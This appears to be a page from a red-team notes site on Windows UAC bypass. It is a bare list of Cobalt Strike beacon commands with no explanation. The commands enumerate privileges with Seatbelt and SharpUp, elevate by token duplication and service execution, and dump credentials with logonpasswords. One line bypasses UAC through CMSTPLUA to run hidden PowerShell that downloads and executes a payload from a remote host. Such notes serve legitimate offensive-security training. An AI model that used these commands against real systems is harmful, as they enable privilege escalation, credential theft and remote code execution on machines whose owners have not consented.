UAC Bypass

whoami /groups

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe uac

beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe

beacon> elevate uac-token-duplication tcp-4444-local
beacon> elevate svc-exe tcp-4444-local

beacon> logonpasswords

beacon> runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe TokenPrivileges

PreviousAlways Install Elevated NextDomain Reconnaissance

Last updated 3 years ago